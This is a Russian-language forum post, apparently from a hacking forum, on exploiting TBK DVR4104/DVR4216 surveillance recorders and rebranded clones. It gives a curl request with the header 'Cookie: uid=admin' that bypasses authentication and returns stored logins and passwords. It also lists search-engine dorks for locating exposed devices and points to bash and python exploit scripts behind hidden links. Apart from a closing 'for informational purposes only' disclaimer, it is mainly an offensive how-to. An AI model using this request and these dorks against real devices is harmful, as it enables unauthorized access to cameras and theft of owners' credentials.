Эксплуатация DVR камер

  • Автор темы XDG12
  • Дата начала
  • Просмотров 3915 Просмотров

XDG12

Пролетарий
56
60
17 Фев 2019
Серия устройств TBK DVR4104 и DVR4216, а также сторонних производителей на базе этих версий уязвимы к обходу проверки подлинности и
с помощью простого заголовка Cookie: uid = admin можно извлекать учетные данные. Главная проблема заключается не в уязвимости, в подобном оборудовании, они довольно примитивны, а в большом количестве камер подключенных к сети. TBK предлагает множество версий оборудования с цифровым лейблом и ребрендингом оборудования IoT DVR. Многие бренды и интернет-продавцы рекламируют устройства под разными именами, и для некоторых пользователей их может быть сложно обновить.

Проэксплуатировать уязвимость можно отправив запрос:
curl "Для просмотра ссылки Войди или Зарегистрируйся" -H "Cookie: uid=admin"
5250

В ответе вы получите заветные логи и пароль.

Найти камеры можно по доркам:
inurl: login.rsp
intitle: ‘DVR Login’
html: ‘/login.rsp’
‘Server: GNU rsp/1.1’

Для просмотра видео необходим IE с установленным плагином DVR.
5251

Сплойты на bash, python
Для просмотра ссылки Войди или ЗарегистрируйсяДля просмотра ссылки Войди или Зарегистрируйся
Статья представлена исключительно в ознакомительных целях, ни одна ссылка не является рекламой.